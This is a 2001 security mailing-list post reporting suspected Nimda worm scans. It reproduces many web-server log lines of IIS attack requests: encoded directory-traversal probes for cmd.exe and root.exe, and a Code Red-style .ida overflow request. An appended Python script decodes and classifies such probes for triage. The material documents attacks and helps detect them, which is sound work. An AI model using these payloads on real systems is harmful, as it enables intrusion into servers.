RE: Newest Nimda variant? Scanning ftp,telnet,smtp,snmp?

From: Bill Walls (stauph@hotmail.com)
Date: 12/22/01


From: "Bill Walls" <stauph@hotmail.com>
To: tlangdon@atctraining.com.au, security-basics@securityfocus.com
Date: Fri, 21 Dec 2001 15:15:00 -0900

My web logs show a similar increase.
63.149.122.72 - - [20/Dec/2001:01:25:30 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.72 - - [20/Dec/2001:01:25:30 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.72 - - [20/Dec/2001:01:25:31 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:01:25:31 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:01:25:31 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:01:25:31 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:01:25:35 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:35 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:35 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:35 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:01:25:36 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:01:25:36 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:01:25:36 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:05:59:04 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.90 - - [20/Dec/2001:05:59:05 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.90 - - [20/Dec/2001:05:59:05 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:05:59:05 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:05:59:06 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:05:59:06 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:05:59:06 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:05:59:07 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.90 - - [20/Dec/2001:05:59:07 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:05:59:07 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:05:59:08 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:05:59:08 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:05:59:08 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:05:59:09 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:05:59:09 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:05:59:09 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:07:57:29 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.90 - - [20/Dec/2001:07:57:29 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.90 - - [20/Dec/2001:07:57:29 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:07:57:30 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:07:57:30 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:07:57:30 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:07:57:30 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:07:57:31 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.90 - - [20/Dec/2001:07:57:31 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:07:57:31 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:07:57:32 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:07:57:32 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:07:57:32 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:07:57:33 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:07:57:33 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:07:57:33 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:08:42:56 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.90 - - [20/Dec/2001:08:42:56 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.90 - - [20/Dec/2001:08:42:56 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:08:42:57 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.90 - - [20/Dec/2001:08:42:57 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:08:42:57 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:08:42:58 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.90 - - [20/Dec/2001:08:42:58 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.90 - - [20/Dec/2001:08:42:58 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:08:42:59 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:08:42:59 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:08:42:59 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.90 - - [20/Dec/2001:08:43:00 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:08:43:00 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.90 - - [20/Dec/2001:08:43:00 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.90 - - [20/Dec/2001:08:43:01 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:09:59:38 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.72 - - [20/Dec/2001:09:59:38 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.72 - - [20/Dec/2001:09:59:38 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:09:59:39 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:09:59:39 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:09:59:39 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:09:59:40 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:09:59:40 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.72 - - [20/Dec/2001:09:59:40 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:09:59:41 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:09:59:41 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:09:59:41 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:09:59:42 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:09:59:42 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:09:59:42 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:09:59:43 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:10:48:05 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.72 - - [20/Dec/2001:10:48:05 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.72 - - [20/Dec/2001:10:48:06 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:10:48:06 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:10:48:06 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:10:48:07 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:10:48:07 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:10:48:07 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.72 - - [20/Dec/2001:10:48:08 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:10:48:08 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:10:48:08 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:10:48:08 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:10:48:09 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:10:48:09 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:10:48:09 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:10:48:10 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:11:24:04 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 283
63.149.122.72 - - [20/Dec/2001:11:24:04 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 281
63.149.122.72 - - [20/Dec/2001:11:24:05 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:11:24:05 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:11:24:05 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:11:24:06 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:11:24:06 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 322
63.149.122.72 - - [20/Dec/2001:11:24:06 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 338
63.149.122.72 - - [20/Dec/2001:11:24:07 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:11:24:07 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:11:24:07 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:11:24:08 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:11:24:08 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:11:24:08 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
63.149.122.72 - - [20/Dec/2001:11:24:08 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:11:24:09 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

...etc etc..
Although this is not the magnitude you quote, as a home user on the
particular IP block that I am on...I haven't seen my port 80 hit this hard
in a while. As far as my other services go...I'm not seeing anything out of
the usual...but again on port 80...I see a lot of these..
211.196.198.70 - - [19/Dec/2001:07:51:37 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
  HTTP/1.0" 400 325
That happens about 6 times a day. Mostly Class A addresses though.
I recognize this as an overflow technique coupled with some unicode
sequences...I really don't KNOW what it's trying to do...but since I run
Apache and not IIS I'm rather annoyed than afraid.

"Buffer Overflow in /dev/stomach due to vodka.o!"
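
The probes quoted in this message can be grouped automatically for triage. The following Python sketch is an added example, not part of the original post: it percent-decodes each request path repeatedly, folds C0/C1-led byte pairs to ASCII the way a lenient decoder would, and labels what remains. The function names, labels and the 64-character filler threshold are assumptions of the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Request lines from the post, unwrapped; /index.html and the shortened .ida line are constructed.
SAMPLE = """\
63.149.122.72 - - [20/Dec/2001:01:25:30 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
63.149.122.72 - - [20/Dec/2001:01:25:31 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
63.149.122.72 - - [20/Dec/2001:01:25:31 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
63.149.122.72 - - [20/Dec/2001:01:25:32 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:33 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
63.149.122.72 - - [20/Dec/2001:01:25:34 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
192.0.2.10 - - [20/Dec/2001:01:26:00 -0700] "GET /index.html HTTP/1.0" 200 1024
"""
SAMPLE += ('211.196.198.70 - - [19/Dec/2001:07:51:37 -0700] "GET /default.ida?' + "N" * 224
           + '%u9090%u9090=a HTTP/1.0" 400 325\n')  # constructed, shortened .ida probe

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def normalise(path, rounds=3):
    """Undo nested percent-encoding, then fold overlong two-byte pairs to ASCII."""
    raw = path.encode("latin-1")
    for _ in range(rounds):
        raw = unquote_to_bytes(raw)  # %255c -> %5c -> backslash; %%35%63 -> %5c -> backslash
    # 0xC0/0xC1 never start valid UTF-8; a lenient decoder maps the pair to one ASCII byte.
    fold = lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)])
    return re.sub(rb"[\xc0\xc1].", fold, raw, flags=re.S).decode("latin-1")

def classify(path):
    """Return a label for the IIS-targeted probes seen in the post, or None."""
    norm = normalise(path).lower()
    if norm.startswith("/default.ida?") and "%u" in norm and re.search(r"(.)\1{63}", norm):
        return "ida-overflow"
    if not re.search(r"/(cmd|root)\.exe\?/c\+", norm):
        return None
    if re.search(r"\.\.[\\/]", norm):
        return "encoded-traversal" if norm != path.lower() else "traversal"
    return "shell-probe"

def summarise(log_text):
    """Count labelled probes per source address: {(ip, label): n}."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        label = classify(m.group(3)) if m else None
        if label:
            hits[(m.group(1), label)] += 1
    return hits
```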
